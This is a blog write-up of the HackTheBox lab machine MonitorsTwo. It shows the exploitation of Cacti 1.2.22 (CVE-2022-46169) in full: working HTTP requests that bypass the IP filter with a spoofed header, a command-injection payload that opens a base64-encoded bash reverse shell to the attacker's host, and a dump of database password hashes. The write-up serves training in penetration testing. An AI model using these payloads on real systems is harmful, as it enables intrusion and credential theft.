<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=">
    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup theme-color -->
<!-- start theme color meta headers -->
<meta name="theme-color" content="#151515">
<meta name="msapplication-navbutton-color" content="#151515">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- end theme color meta headers -->


<!-- Setup Google Analytics -->



<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->


<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>From Default Credentials to Full Control - Unraveling MonitorsTwo on HackTheBox | Nehal Zaman</title>
<meta name="generator" content="Jekyll v4.3.1" />
<meta property="og:title" content="From Default Credentials to Full Control - Unraveling MonitorsTwo on HackTheBox" />
<meta name="author" content="Nehal Zaman" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="A perpetual learner. CTF player. Programmer." />
<meta property="og:description" content="A perpetual learner. CTF player. Programmer." />
<link rel="canonical" href="http://localhost:4000/posts/monitorstwo_htb.html" />
<meta property="og:url" content="http://localhost:4000/posts/monitorstwo_htb.html" />
<meta property="og:site_name" content="Nehal Zaman" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2023-08-06T00:00:00-04:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="From Default Credentials to Full Control - Unraveling MonitorsTwo on HackTheBox" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Nehal Zaman"},"dateModified":"2023-08-06T00:00:00-04:00","datePublished":"2023-08-06T00:00:00-04:00","description":"A perpetual learner. CTF player. Programmer.","headline":"From Default Credentials to Full Control - Unraveling MonitorsTwo on HackTheBox","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/monitorstwo_htb.html"},"url":"http://localhost:4000/posts/monitorstwo_htb.html"}</script>
<!-- End Jekyll SEO tag -->

  </head>

  <body>

    <header>
      <div class="container">
        <a id="a-title" href="/">
          <h1>Nehal Zaman</h1>
        </a>
        <h2>A perpetual learner. CTF player. Programmer.</h2>

        <section id="downloads">
          
        </section>
      </div>
    </header>

    <div class="container">
      <section id="main_content">
        <small>6 August 2023</small>
<h1>From Default Credentials to Full Control - Unraveling MonitorsTwo on HackTheBox</h1>

<p class="view">by Nehal Zaman</p>

<p><img src="/assets/images/writeups/monitorstwo/banner.png" alt="" /></p>

<h1 id="introduction">INTRODUCTION</h1>

<p>Greetings everyone, in this blog, we’ll be diving into <a href="https://app.hackthebox.com/machines/MonitorsTwo">MonitorsTwo</a>, a beginner-friendly Linux machine crafted by <a href="https://app.hackthebox.com/users/114053">TheCyberGeek</a> on <a href="https://app.hackthebox.com/home">HackTheBox</a>.</p>

<p>Our journey begins by exploiting a vulnerable version of <code class="language-plaintext highlighter-rouge">Cacti</code> to gain initial access. Then, we’ll uncover hidden secrets to obtain user credentials, enabling us to escape the <code class="language-plaintext highlighter-rouge">Docker</code> environment.</p>

<p>Finally, we’ll exploit the same <code class="language-plaintext highlighter-rouge">Docker</code> setup to achieve <code class="language-plaintext highlighter-rouge">root</code> access.</p>

<p>Let’s explore the steps to conquer <strong>MonitorsTwo</strong> together!</p>

<h1 id="scanning">SCANNING</h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Documents/htb/monitorstwo]
└─<span class="nv">$ </span>rustscan <span class="nt">-a</span> 10.10.11.211 <span class="nt">-r</span> 1-65535 <span class="nt">-u</span> 5000                           
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| <span class="o">{}</span>  <span class="o">}</span>| <span class="o">{</span> <span class="o">}</span> |<span class="o">{</span> <span class="o">{</span>__ <span class="o">{</span>_   _<span class="o">}{</span> <span class="o">{</span>__  /  ___<span class="o">}</span> / <span class="o">{}</span> <span class="se">\ </span>|  <span class="sb">`</span>| |
| .-. <span class="se">\|</span> <span class="o">{</span>_<span class="o">}</span> |.-._<span class="o">}</span> <span class="o">}</span> | |  .-._<span class="o">}</span> <span class="o">}</span><span class="se">\ </span>    <span class="o">}</span>/  /<span class="se">\ </span> <span class="se">\|</span> |<span class="se">\ </span> |
<span class="sb">`</span>-<span class="s1">' `-'</span><span class="sb">`</span><span class="nt">-----</span><span class="s1">'`----'</span>  <span class="sb">`</span>-<span class="s1">'  `----'</span>  <span class="sb">`</span><span class="nt">---</span><span class="s1">' `-'</span>  <span class="sb">`</span>-<span class="s1">'`-'</span> <span class="sb">`</span>-<span class="s1">'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.211:22
Open 10.10.11.211:80
[~] Starting Script(s)
[&gt;] Script to be run Some("nmap -vvv -p  ")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-06 08:45 EDT
Initiating Ping Scan at 08:45
Scanning 10.10.11.211 [2 ports]
Completed Ping Scan at 08:45, 0.15s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:45
Completed Parallel DNS resolution of 1 host. at 08:45, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 08:45
Scanning 10.10.11.211 [2 ports]
Discovered open port 22/tcp on 10.10.11.211
Discovered open port 80/tcp on 10.10.11.211
Completed Connect Scan at 08:45, 0.22s elapsed (2 total ports)
Nmap scan report for 10.10.11.211
Host is up, received syn-ack (0.17s latency).
Scanned at 2023-08-06 08:45:14 EDT for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
</span></code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">Rustscan</code> has unveiled 2 accessible ports: <strong>22</strong> and <strong>80</strong>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Documents/htb/monitorstwo]
└─<span class="nv">$ </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-p22</span>,80 10.10.11.211                       
Starting Nmap 7.93 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2023-08-06 08:46 EDT
Nmap scan report <span class="k">for </span>10.10.11.211
Host is up <span class="o">(</span>0.15s latency<span class="o">)</span><span class="nb">.</span>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae <span class="o">(</span>RSA<span class="o">)</span>
|   256 b7896c0b20ed49b2c1867c2992741c1f <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 18cd9d08a621a8b8b6f79f8d405154fb <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    nginx 1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-server-header: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Login to Cacti
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>14.71 seconds
</code></pre></div></div>

<p>Port 22 hosts an <strong>SSH</strong> service, while port 80 is home to a <strong>web service</strong>, specifically <code class="language-plaintext highlighter-rouge">Cacti</code>.</p>

<h1 id="enumerating-web">ENUMERATING WEB</h1>

<p><img src="/assets/images/writeups/monitorstwo/1.png" alt="" /></p>

<p>Upon navigating to the web interface, the default login page of <code class="language-plaintext highlighter-rouge">Cacti</code> greets us.</p>

<p><img src="/assets/images/writeups/monitorstwo/2.png" alt="" /></p>

<p>By leveraging a weak set of credentials (<code class="language-plaintext highlighter-rouge">admin</code>/<code class="language-plaintext highlighter-rouge">admin</code>), we successfully gain access to the application.</p>

<p>The <code class="language-plaintext highlighter-rouge">Cacti</code> version present here is <code class="language-plaintext highlighter-rouge">1.2.22</code>.</p>

<p>Upon conducting a swift Google search, it becomes evident that this specific version of <code class="language-plaintext highlighter-rouge">Cacti</code> is susceptible to an <code class="language-plaintext highlighter-rouge">unauthenticated remote code execution</code>, identified as <code class="language-plaintext highlighter-rouge">CVE-2022-46169</code>.</p>

<p>This vulnerability comprises two distinct components: an <code class="language-plaintext highlighter-rouge">authentication bypass</code> vulnerability, alongside a <code class="language-plaintext highlighter-rouge">remote code execution</code> vulnerability.</p>

<p>You can more about the vulnerability: <a href="https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/">here</a>.</p>

<h1 id="analysing-the-authentication-bypass-issue">ANALYSING THE <code class="language-plaintext highlighter-rouge">AUTHENTICATION BYPASS</code> ISSUE</h1>

<p>The <code class="language-plaintext highlighter-rouge">remote_agent.php</code> script in <code class="language-plaintext highlighter-rouge">Cacti</code> is meant to be used by authorized clients only.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET /remote_agent.php HTTP/1.1
Host: 10.10.11.211
User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:102.0<span class="o">)</span> Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,<span class="k">*</span>/<span class="k">*</span><span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8
Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5
Accept-Encoding: <span class="nb">gzip</span>, deflate
DNT: 1
Connection: close
Cookie: <span class="nv">Cacti</span><span class="o">=</span>f755b3fc5f85ec444345b298ec66e223<span class="p">;</span> <span class="nv">CactiDateTime</span><span class="o">=</span>Sun Aug 06 2023 08:52:48 GMT-0400 <span class="o">(</span>Eastern Daylight Time<span class="o">)</span><span class="p">;</span> <span class="nv">CactiTimeZone</span><span class="o">=</span><span class="nt">-240</span>
Upgrade-Insecure-Requests: 1

</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HTTP/1.1 200 OK
Server: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
Date: Sun, 06 Aug 2023 13:07:25 GMT
Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>UTF-8
Connection: close
X-Powered-By: PHP/7.4.33
Last-Modified: Sun, 06 Aug 2023 13:07:19 GMT
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src <span class="k">*</span><span class="p">;</span> img-src <span class="s1">'self'</span>  data: blob:<span class="p">;</span> style-src <span class="s1">'self'</span> <span class="s1">'unsafe-inline'</span> <span class="p">;</span> script-src <span class="s1">'self'</span>  <span class="s1">'unsafe-inline'</span> <span class="p">;</span> frame-ancestors <span class="s1">'self'</span><span class="p">;</span> worker-src <span class="s1">'self'</span> <span class="p">;</span>
P3P: <span class="nv">CP</span><span class="o">=</span><span class="s2">"CAO PSA OUR"</span>
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Length: 49

FATAL: You are not authorized to use this service
</code></pre></div></div>

<p>When we tried to access <code class="language-plaintext highlighter-rouge">/remote_agent.php</code>, we encountered an error message saying <code class="language-plaintext highlighter-rouge">FATAL: You are not authorized to use this service</code>.</p>

<p>It appears that this error is related to a filter based on <code class="language-plaintext highlighter-rouge">IP</code> addresses.</p>

<p>However, we managed to bypass this filter quite easily. By adding a special HTTP header called <code class="language-plaintext highlighter-rouge">X-Forwarded</code>, we tricked the system into thinking that the request was coming from an authorized client, in this case, <code class="language-plaintext highlighter-rouge">127.0.0.1</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET /remote_agent.php HTTP/1.1
Host: 10.10.11.211
X-Forwarded: 127.0.0.1
User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:102.0<span class="o">)</span> Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,<span class="k">*</span>/<span class="k">*</span><span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8
Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5
Accept-Encoding: <span class="nb">gzip</span>, deflate
DNT: 1
Connection: close
Cookie: <span class="nv">Cacti</span><span class="o">=</span>f755b3fc5f85ec444345b298ec66e223<span class="p">;</span> <span class="nv">CactiDateTime</span><span class="o">=</span>Sun Aug 06 2023 08:52:48 GMT-0400 <span class="o">(</span>Eastern Daylight Time<span class="o">)</span><span class="p">;</span> <span class="nv">CactiTimeZone</span><span class="o">=</span><span class="nt">-240</span>
Upgrade-Insecure-Requests: 1

</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HTTP/1.1 200 OK
Server: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
Date: Sun, 06 Aug 2023 13:11:59 GMT
Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>UTF-8
Connection: close
X-Powered-By: PHP/7.4.33
Last-Modified: Sun, 06 Aug 2023 13:11:58 GMT
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src <span class="k">*</span><span class="p">;</span> img-src <span class="s1">'self'</span>  data: blob:<span class="p">;</span> style-src <span class="s1">'self'</span> <span class="s1">'unsafe-inline'</span> <span class="p">;</span> script-src <span class="s1">'self'</span>  <span class="s1">'unsafe-inline'</span> <span class="p">;</span> frame-ancestors <span class="s1">'self'</span><span class="p">;</span> worker-src <span class="s1">'self'</span> <span class="p">;</span>
P3P: <span class="nv">CP</span><span class="o">=</span><span class="s2">"CAO PSA OUR"</span>
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Length: 21

Unknown Agent Request
</code></pre></div></div>

<p>After making this adjustment, the error message disappeared. This means we successfully got past the initial restriction.</p>

<h1 id="analysing-the-remote-code-execution">ANALYSING THE <code class="language-plaintext highlighter-rouge">REMOTE CODE EXECUTION</code></h1>

<p>The parameter <code class="language-plaintext highlighter-rouge">poller_id</code> provided by the user is directly utilized as the first argument for the <code class="language-plaintext highlighter-rouge">proc_open</code> PHP function, lacking any form of sanitization or escaping.</p>

<p>This issue can be exploited by a malicious user through manipulation of the <code class="language-plaintext highlighter-rouge">action</code> parameter, setting it to <code class="language-plaintext highlighter-rouge">polldata</code>.</p>

<p>However, to successfully exploit this vulnerability, two additional prerequisites are required: a valid <code class="language-plaintext highlighter-rouge">host_id</code> and <code class="language-plaintext highlighter-rouge">local_data_ids</code></p>

<p><img src="/assets/images/writeups/monitorstwo/3.png" alt="" /></p>

<p>There is just one entry for the host <code class="language-plaintext highlighter-rouge">Linux Local Machine</code>, which carries an ID of <code class="language-plaintext highlighter-rouge">1</code>. This entry signifies the local system itself.</p>

<p><img src="/assets/images/writeups/monitorstwo/4.png" alt="" /></p>

<p>Among the various data sources, we will focus on the <code class="language-plaintext highlighter-rouge">Local Linux Machine - Uptime</code> entry with an ID of <code class="language-plaintext highlighter-rouge">6</code>. This choice is influenced by its association with the <code class="language-plaintext highlighter-rouge">Device - Uptime</code> template, which incorporates the crucial <code class="language-plaintext highlighter-rouge">POLLER_ACTION_SCRIPT_PHP</code> action, pivotal in initiating the <code class="language-plaintext highlighter-rouge">proc_open</code> call.</p>

<p>With all the necessary components in place, we proceed to construct our request.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET /remote_agent.php?action<span class="o">=</span>polldata&amp;host_id<span class="o">=</span>1&amp;local_data_ids%5b%5d<span class="o">=</span>6&amp;poller_id<span class="o">=</span><span class="p">;</span><span class="nb">sleep</span>%20100 HTTP/1.1
Host: 10.10.11.211
X-Forwarded: 127.0.0.1
User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:102.0<span class="o">)</span> Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,<span class="k">*</span>/<span class="k">*</span><span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8
Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5
Accept-Encoding: <span class="nb">gzip</span>, deflate
DNT: 1
Connection: close
Cookie: <span class="nv">Cacti</span><span class="o">=</span>f755b3fc5f85ec444345b298ec66e223<span class="p">;</span> <span class="nv">CactiDateTime</span><span class="o">=</span>Sun Aug 06 2023 08:52:48 GMT-0400 <span class="o">(</span>Eastern Daylight Time<span class="o">)</span><span class="p">;</span> <span class="nv">CactiTimeZone</span><span class="o">=</span><span class="nt">-240</span>
Upgrade-Insecure-Requests: 1

</code></pre></div></div>

<p>In the example, we’ve added some code like <code class="language-plaintext highlighter-rouge">sleep 100</code> into the <code class="language-plaintext highlighter-rouge">poller_id</code> part. When we send this request, the server waits for 100 seconds before responding, showing that we’ve successfully made the code run remotely.</p>

<h1 id="shell-as-www-data">SHELL AS <code class="language-plaintext highlighter-rouge">www-data</code></h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET /remote_agent.php?action<span class="o">=</span>polldata&amp;host_id<span class="o">=</span>1&amp;local_data_ids%5b%5d<span class="o">=</span>6&amp;poller_id<span class="o">=</span><span class="p">;</span><span class="nb">echo</span>%20YmFzaCAtYyAiYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC40NS80NDMgMD4mMSIK|base64%20-d|bash HTTP/1.1
Host: 10.10.11.211
X-Forwarded: 127.0.0.1
User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:102.0<span class="o">)</span> Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,<span class="k">*</span>/<span class="k">*</span><span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8
Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5
Accept-Encoding: <span class="nb">gzip</span>, deflate
DNT: 1
Connection: close
Cookie: <span class="nv">Cacti</span><span class="o">=</span>f755b3fc5f85ec444345b298ec66e223<span class="p">;</span> <span class="nv">CactiDateTime</span><span class="o">=</span>Sun Aug 06 2023 08:52:48 GMT-0400 <span class="o">(</span>Eastern Daylight Time<span class="o">)</span><span class="p">;</span> <span class="nv">CactiTimeZone</span><span class="o">=</span><span class="nt">-240</span>
Upgrade-Insecure-Requests: 1

</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Documents/htb/monitorstwo]
└─<span class="nv">$ </span><span class="nb">echo</span> <span class="s1">'bash -c "bash -i &gt;&amp; /dev/tcp/10.10.14.45/443 0&gt;&amp;1"'</span> | <span class="nb">base64
</span>YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40NS80NDMgMD4mMSIK
                                                                                                                                                                                             
┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Documents/htb/monitorstwo]
└─<span class="nv">$ </span>nc <span class="nt">-nlvp</span> 443
listening on <span class="o">[</span>any] 443 ...
connect to <span class="o">[</span>10.10.14.45] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.211] 45346
bash: cannot <span class="nb">set </span>terminal process group <span class="o">(</span>1<span class="o">)</span>: Inappropriate ioctl <span class="k">for </span>device
bash: no job control <span class="k">in </span>this shell
www-data@50bca5e748b0:/var/www/html<span class="nv">$ </span>
</code></pre></div></div>

<p>Leveraging the blind command injection vulnerability, we successfully attain a reverse shell as the user <code class="language-plaintext highlighter-rouge">www-data</code>.</p>

<h1 id="shell-as-marcus">SHELL AS <code class="language-plaintext highlighter-rouge">marcus</code></h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@50bca5e748b0:/var/www/html<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-al</span> /
<span class="nb">ls</span> <span class="nt">-al</span> /
total 84
drwxr-xr-x   1 root root 4096 Mar 21 06:49 <span class="nb">.</span>
drwxr-xr-x   1 root root 4096 Mar 21 06:49 ..
<span class="nt">-rwxr-xr-x</span>   1 root root    0 Mar 21 06:49 .dockerenv
drwxr-xr-x   1 root root 4096 Mar 22 09:21 bin
drwxr-xr-x   2 root root 4096 Mar 22 09:21 boot
drwxr-xr-x   5 root root  340 Aug  6 09:53 dev
<span class="nt">-rw-r--r--</span>   1 root root  648 Jan  5  2023 entrypoint.sh
drwxr-xr-x   1 root root 4096 Mar 21 06:49 etc
drwxr-xr-x   2 root root 4096 Mar 22 09:21 home
drwxr-xr-x   1 root root 4096 Nov 15  2022 lib
drwxr-xr-x   2 root root 4096 Mar 22 09:21 lib64
drwxr-xr-x   2 root root 4096 Mar 22 09:21 media
drwxr-xr-x   2 root root 4096 Mar 22 09:21 mnt
drwxr-xr-x   2 root root 4096 Mar 22 09:21 opt
dr-xr-xr-x 312 root root    0 Aug  6 09:53 proc
drwx------   1 root root 4096 Mar 21 06:50 root
drwxr-xr-x   1 root root 4096 Nov 15  2022 run
drwxr-xr-x   1 root root 4096 Jan  9  2023 sbin
drwxr-xr-x   2 root root 4096 Mar 22 09:21 srv
dr-xr-xr-x  13 root root    0 Aug  6 09:53 sys
drwxrwxrwt   1 root root 4096 Aug  6 09:56 tmp
drwxr-xr-x   1 root root 4096 Nov 13  2022 usr
drwxr-xr-x   1 root root 4096 Nov 15  2022 var
</code></pre></div></div>

<p>The presence of <code class="language-plaintext highlighter-rouge">.dockerenv</code> within the <code class="language-plaintext highlighter-rouge">/</code> directory serves as confirmation that we are indeed operating within a Docker container.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@50bca5e748b0:/var/www/html<span class="nv">$ </span><span class="nb">cat</span> /entrypoint.sh
<span class="nb">cat</span> /entrypoint.sh
<span class="c">#!/bin/bash</span>
<span class="nb">set</span> <span class="nt">-ex</span>

wait-for-it db:3306 <span class="nt">-t</span> 300 <span class="nt">--</span> <span class="nb">echo</span> <span class="s2">"database is connected"</span>
<span class="k">if</span> <span class="o">[[</span> <span class="o">!</span> <span class="si">$(</span>mysql <span class="nt">--host</span><span class="o">=</span>db <span class="nt">--user</span><span class="o">=</span>root <span class="nt">--password</span><span class="o">=</span>root cacti <span class="nt">-e</span> <span class="s2">"show tables"</span><span class="si">)</span> <span class="o">=</span>~ <span class="s2">"automation_devices"</span> <span class="o">]]</span><span class="p">;</span> <span class="k">then
    </span>mysql <span class="nt">--host</span><span class="o">=</span>db <span class="nt">--user</span><span class="o">=</span>root <span class="nt">--password</span><span class="o">=</span>root cacti &lt; /var/www/html/cacti.sql
    mysql <span class="nt">--host</span><span class="o">=</span>db <span class="nt">--user</span><span class="o">=</span>root <span class="nt">--password</span><span class="o">=</span>root cacti <span class="nt">-e</span> <span class="s2">"UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"</span>
    mysql <span class="nt">--host</span><span class="o">=</span>db <span class="nt">--user</span><span class="o">=</span>root <span class="nt">--password</span><span class="o">=</span>root cacti <span class="nt">-e</span> <span class="s2">"SET GLOBAL time_zone = 'UTC'"</span>
<span class="k">fi

</span><span class="nb">chown </span>www-data:www-data <span class="nt">-R</span> /var/www/html
<span class="c"># first arg is `-f` or `--some-option`</span>
<span class="k">if</span> <span class="o">[</span> <span class="s2">"</span><span class="k">${</span><span class="nv">1</span><span class="p">#-</span><span class="k">}</span><span class="s2">"</span> <span class="o">!=</span> <span class="s2">"</span><span class="nv">$1</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
        </span><span class="nb">set</span> <span class="nt">--</span> apache2-foreground <span class="s2">"</span><span class="nv">$@</span><span class="s2">"</span>
<span class="k">fi

</span><span class="nb">exec</span> <span class="s2">"</span><span class="nv">$@</span><span class="s2">"</span>
</code></pre></div></div>

<p>Upon inspecting the <code class="language-plaintext highlighter-rouge">/</code> directory, we encounter the <code class="language-plaintext highlighter-rouge">entrypoint.sh</code> script, which divulges valuable database information.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@50bca5e748b0:/var/www/html<span class="nv">$ </span>mysql <span class="nt">--host</span><span class="o">=</span>db <span class="nt">--user</span><span class="o">=</span>root <span class="nt">--password</span><span class="o">=</span>root cacti <span class="nt">-e</span> <span class="s2">"show tables"</span>
&lt; <span class="nt">--user</span><span class="o">=</span>root <span class="nt">--password</span><span class="o">=</span>root cacti <span class="nt">-e</span> <span class="s2">"show tables"</span>
<span class="nb">.</span>
<span class="nb">.</span>
SNIP
<span class="nb">.</span>
<span class="nb">.</span>
snmpagent_managers
snmpagent_managers_notifications
snmpagent_mibs
snmpagent_notifications_log
user_auth
user_auth_cache
user_auth_group
user_auth_group_members
user_auth_group_perms
<span class="nb">.</span>
<span class="nb">.</span>
SNIP
<span class="nb">.</span>
<span class="nb">.</span>
</code></pre></div></div>

<p>Among the various tables, the <code class="language-plaintext highlighter-rouge">user_auth</code> table captures our interest.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@50bca5e748b0:/var/www/html<span class="nv">$ </span>mysql <span class="nt">--host</span><span class="o">=</span>db <span class="nt">--user</span><span class="o">=</span>root <span class="nt">--password</span><span class="o">=</span>root cacti <span class="nt">-e</span> <span class="s2">"desc user_auth"</span>
&lt;<span class="nv">user</span><span class="o">=</span>root <span class="nt">--password</span><span class="o">=</span>root cacti <span class="nt">-e</span> <span class="s2">"desc user_auth"</span>
Field   Type    Null    Key     Default Extra
<span class="nb">id      </span>mediumint<span class="o">(</span>8<span class="o">)</span> unsigned   NO      PRI     NULL    auto_increment
username        varchar<span class="o">(</span>50<span class="o">)</span>     NO      MUL     0
password        varchar<span class="o">(</span>256<span class="o">)</span>    NO
realm   mediumint<span class="o">(</span>8<span class="o">)</span>    NO      MUL     0
full_name       varchar<span class="o">(</span>100<span class="o">)</span>    YES             0
email_address   varchar<span class="o">(</span>128<span class="o">)</span>    YES             NULL
must_change_password    char<span class="o">(</span>2<span class="o">)</span> YES             NULL
password_change char<span class="o">(</span>2<span class="o">)</span> YES             on
show_tree       char<span class="o">(</span>2<span class="o">)</span> YES             on
show_list       char<span class="o">(</span>2<span class="o">)</span> YES             on
show_preview    char<span class="o">(</span>2<span class="o">)</span> NO              on
graph_settings  char<span class="o">(</span>2<span class="o">)</span> YES             NULL
login_opts      tinyint<span class="o">(</span>3<span class="o">)</span> unsigned     NO              1
policy_graphs   tinyint<span class="o">(</span>3<span class="o">)</span> unsigned     NO              1
policy_trees    tinyint<span class="o">(</span>3<span class="o">)</span> unsigned     NO              1
policy_hosts    tinyint<span class="o">(</span>3<span class="o">)</span> unsigned     NO              1
policy_graph_templates  tinyint<span class="o">(</span>3<span class="o">)</span> unsigned     NO              1
enabled char<span class="o">(</span>2<span class="o">)</span> NO      MUL     on
lastchange      int<span class="o">(</span>11<span class="o">)</span> NO              <span class="nt">-1</span>
lastlogin       int<span class="o">(</span>11<span class="o">)</span> NO              <span class="nt">-1</span>
password_history        varchar<span class="o">(</span>4096<span class="o">)</span>   NO              <span class="nt">-1</span>
locked  varchar<span class="o">(</span>3<span class="o">)</span>      NO
failed_attempts int<span class="o">(</span>5<span class="o">)</span>  NO              0
lastfail        int<span class="o">(</span>10<span class="o">)</span> unsigned        NO              0
reset_perms     int<span class="o">(</span>10<span class="o">)</span> unsigned        NO              0
</code></pre></div></div>

<p>Within the <code class="language-plaintext highlighter-rouge">user_auth</code> table, we identify noteworthy columns: <code class="language-plaintext highlighter-rouge">username</code> and <code class="language-plaintext highlighter-rouge">password</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@50bca5e748b0:/var/www/html<span class="nv">$ </span>mysql <span class="nt">--host</span><span class="o">=</span>db <span class="nt">--user</span><span class="o">=</span>root <span class="nt">--password</span><span class="o">=</span>root cacti <span class="nt">-e</span> <span class="s2">"select username,password from user_auth"</span>
&lt; cacti <span class="nt">-e</span> <span class="s2">"select username,password from user_auth"</span>
username        password
admin   <span class="nv">$2y$10$IhEA</span>.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC
guest   43e9a4ab75570f5b
marcus  <span class="nv">$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1</span>.3WeKlBn70JonsdW/MhFYK4C
</code></pre></div></div>

